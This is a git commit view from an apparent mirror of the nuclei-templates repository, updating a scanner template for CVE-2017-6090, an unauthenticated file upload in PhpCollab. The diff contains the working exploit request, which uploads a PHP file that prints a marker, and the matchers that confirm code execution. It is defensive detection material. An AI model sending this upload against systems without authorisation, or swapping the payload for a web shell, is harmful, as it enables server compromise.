daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

minor updates

patch-1
sandeep 2021-07-27 17:50:49 +05:30
parent 315215aa02
commit 448aec1edb
1 changed files with 5 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
cves/2017/CVE-2017-6090.yaml
View File

@ -4,7 +4,7 @@ info:
name: PhpCollab (unauthenticated) Arbitrary File Upload
author: pikpikcu
severity: critical
tags: cve,cve2017,phpCollab,rce
tags: cve,cve2017,phpcollab,rce,fileupload
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090
requests:
@ -22,10 +22,10 @@ requests:
Content-Length: 237
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="backdoor.php"
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php phpinfo(); ?>
<?php echo md5('phpcollab_rce');?>
-----------------------------154934846911423734231554128137--
@ -38,10 +38,9 @@ requests:
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo()"
- "PHP Version"
part: body
words:
- "48dbd2384cb6b996fa1e2855c7f0567f"
- type: status
status: